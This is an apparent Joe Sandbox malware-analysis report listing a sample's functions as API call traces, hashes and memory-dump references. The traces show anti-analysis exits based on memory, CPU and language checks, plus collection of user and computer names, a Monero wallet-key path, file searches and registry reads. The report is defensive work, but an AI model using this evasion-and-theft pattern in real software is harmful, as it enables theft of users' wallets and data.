Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,012006D8), ref: 009693EE

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 009511D0: ExitProcess.KERNEL32 ref: 00951211

Part of subcall function 00951160: GetSystemInfo.KERNEL32(?), ref: 0095116A
Part of subcall function 00951160: ExitProcess.KERNEL32 ref: 0095117E

Part of subcall function 00951110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0095112B
Part of subcall function 00951110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00951132
Part of subcall function 00951110: ExitProcess.KERNEL32 ref: 00951143

Part of subcall function 00951220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0095123E
Part of subcall function 00951220: __aulldiv.LIBCMT ref: 00951258
Part of subcall function 00951220: __aulldiv.LIBCMT ref: 00951266
Part of subcall function 00951220: ExitProcess.KERNEL32 ref: 00951294

Part of subcall function 00966210: GetUserDefaultLangID.KERNEL32 ref: 00966214

Part of subcall function 00951190: ExitProcess.KERNEL32 ref: 009511C6

Part of subcall function 009672F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009511B7), ref: 00967320
Part of subcall function 009672F0: RtlAllocateHeap.NTDLL(00000000), ref: 00967327
Part of subcall function 009672F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0096733F

Part of subcall function 00967380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009673B0
Part of subcall function 00967380: RtlAllocateHeap.NTDLL(00000000), ref: 009673B7
Part of subcall function 00967380: GetComputerNameA.KERNEL32(?,00000104), ref: 009673CF

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012089D0,?,009710DC,?,00000000,?,009710E0,?,00000000,00970ADA), ref: 0096656A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00966588
CloseHandle.KERNEL32(00000000), ref: 00966599
Sleep.KERNEL32(00001770), ref: 009665A4
CloseHandle.KERNEL32(?,00000000,?,012089D0,?,009710DC,?,00000000,?,009710E0,?,00000000,00970ADA), ref: 009665BA
ExitProcess.KERNEL32 ref: 009665C2

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 4140b456d64b7e5d99d50e8ae137a3544889b1b7d53d3bd43e95a530f8e6dd98
Instruction ID: 423627fcfcc5e9091a865c200b268e303ca5025640e887d384ab77e7a907e9ab
Opcode Fuzzy Hash: 4140b456d64b7e5d99d50e8ae137a3544889b1b7d53d3bd43e95a530f8e6dd98
Instruction Fuzzy Hash: 02312871944208AACB04FBF0DC56FAE7738AF85300F004528F913B6192DFB06A48CBA2

Function 00959A10 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00959A3C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A61
LocalAlloc.KERNEL32(00000040,?), ref: 00959A81
ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959AAA
LocalFree.KERNEL32(0095148F), ref: 00959AE0
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00959AEA

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: 769e491ff766a1283c407bf4ba0421c4659566cb6f08933a49f08b2a6aa71608
Instruction ID: a9c93011159cd12c47afed683bc1b59b53ba43df4c8e4c1fca41f92e13926961
Opcode Fuzzy Hash: 769e491ff766a1283c407bf4ba0421c4659566cb6f08933a49f08b2a6aa71608
Instruction Fuzzy Hash: 1D311E74A00209EFDB14DF95C885BAE7BB9FF48305F108158F915AB290DB74AA85CFA0

Function 00964260 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0120EBE0), ref: 009642BB

Part of subcall function 00968880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009688AB

lstrcat.KERNEL32(?,00000000), ref: 009642E1
lstrcat.KERNEL32(?,?), ref: 00964300
lstrcat.KERNEL32(?,?), ref: 00964314
lstrcat.KERNEL32(?,011FAFA0), ref: 00964327
lstrcat.KERNEL32(?,?), ref: 0096433B
lstrcat.KERNEL32(?,0120E1F8), ref: 0096434F

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 00968830: GetFileAttributesA.KERNEL32(00000000,?,00951B94,?,?,0097554C,?,?,00970E07), ref: 0096883F

Part of subcall function 00964050: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00964060
Part of subcall function 00964050: RtlAllocateHeap.NTDLL(00000000), ref: 00964067
Part of subcall function 00964050: wsprintfA.USER32 ref: 00964086
Part of subcall function 00964050: FindFirstFileA.KERNEL32(?,?), ref: 0096409D

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 4c68067fe405d1ded4c9ea1197d548daab9fdb90bf5cc32fc4621a03d1344be9
Instruction ID: 858d36b4ada7889264d2932f8b419ff2919cc47846b4181cab6f14e01e5eb674
Opcode Fuzzy Hash: 4c68067fe405d1ded4c9ea1197d548daab9fdb90bf5cc32fc4621a03d1344be9
Instruction Fuzzy Hash: 423165B290021897CB14FBA0DC95FDE773CAF98704F408689B61A97091EE7497C9CFA4

Function 00951220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0095123E
__aulldiv.LIBCMT ref: 00951258
__aulldiv.LIBCMT ref: 00951266
ExitProcess.KERNEL32 ref: 00951294

Strings

@, xrefs: 00951233

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: b176e8a79b344927342a76f915a25856b9eaf9874f3ca544e0e13ee859bfb5cb
Instruction ID: 3e6843d8e96d3d6f7eab98a6837dcfebbb4bc7bd7fb854463a3d0e05061a0a16
Opcode Fuzzy Hash: b176e8a79b344927342a76f915a25856b9eaf9874f3ca544e0e13ee859bfb5cb
Instruction Fuzzy Hash: B20112B0D40308BBDB10EBD5CC49F9EBB78EB54706F108449FA15B61C0DB7455858B59

Function 00963BC0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,0120E218,00000000,00020119,?), ref: 00963C04
RegQueryValueExA.ADVAPI32(?,0120ED90,00000000,00000000,00000000,000000FF), ref: 00963C28
RegCloseKey.ADVAPI32(?), ref: 00963C32
lstrcat.KERNEL32(?,00000000), ref: 00963C57
lstrcat.KERNEL32(?,0120EDA8), ref: 00963C6B

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: 2ad437c2ed0b240e61af5fc5f5859dfb7dda4c99be37407b1f4909c856a5cba8
Instruction ID: 99ce5be8f0c361a989ac2d38d56951f1775ee7ea3abb57098e32b857846ac088
Opcode Fuzzy Hash: 2ad437c2ed0b240e61af5fc5f5859dfb7dda4c99be37407b1f4909c856a5cba8
Instruction Fuzzy Hash: 194137B6900108ABDB15EBA0DC56FEE773DAB88300F00895DB61A57181FEB557CC8BD1

Function 6C68C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C68C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C68C969
GetSystemInfo.KERNEL32(?), ref: 6C68C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C68C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C68C9E2

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: cb57595f118f1758c93bff4230bd61748a5b03148aa976642d3247b6165ee782
Instruction ID: 2fd10167984c5f841c72a342b0593c1d251beabfb9684447e481b5e01146318c
Opcode Fuzzy Hash: cb57595f118f1758c93bff4230bd61748a5b03148aa976642d3247b6165ee782
Instruction Fuzzy Hash: 6521D7327422147BDF04AE65ECC4BAE73BAAB86744F50025AFA17A7B40DB605C0487BD

Function 009678A0 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009678D7
RtlAllocateHeap.NTDLL(00000000), ref: 009678DE
RegOpenKeyExA.KERNEL32(80000002,011FB690,00000000,00020119,?), ref: 009678FE
RegQueryValueExA.KERNEL32(?,0120E078,00000000,00000000,000000FF,000000FF), ref: 0096791F
RegCloseKey.ADVAPI32(?), ref: 00967932

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 10d1ae3769919c7b234b8a15117381b47c027aec6a2d7b0a925a302d409f0d88
Instruction ID: f055b80a31ba53aa0964114bf2e693449d9a94b18513434659fc6b70e90da3ad
Opcode Fuzzy Hash: 10d1ae3769919c7b234b8a15117381b47c027aec6a2d7b0a925a302d409f0d88
Instruction Fuzzy Hash: E0116AB1A44205ABDB04DBD4DC4AFABBBB8EB48B14F10411DF619A7280DB7459408BA0

Function 009512A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009512B4
RtlAllocateHeap.NTDLL(00000000), ref: 009512BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 009512D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009512F5
RegCloseKey.ADVAPI32(?), ref: 009512FF

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 2dedea18291ae2cf47e11faccf2f653e04f72fe555d8a3c5b71b6528d3d6cf7e
Instruction ID: fd734468c17bb8a841ad5afff79bf2b53a4e7aba60d7ef9be7d781345a6ba93e
Opcode Fuzzy Hash: 2dedea18291ae2cf47e11faccf2f653e04f72fe555d8a3c5b71b6528d3d6cf7e
Instruction Fuzzy Hash: 6001CD79A40208BFDB04DFE4DC59FAEBB79AF48701F104159FA19D7280DA70AA458B50

Function 00959FF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01208890,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0095A00D
LoadLibraryA.KERNEL32(0120E0F8), ref: 0095A096

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A1F0: lstrlen.KERNEL32(00954F55,?,?,00954F55,00970DC6), ref: 0096A1FB
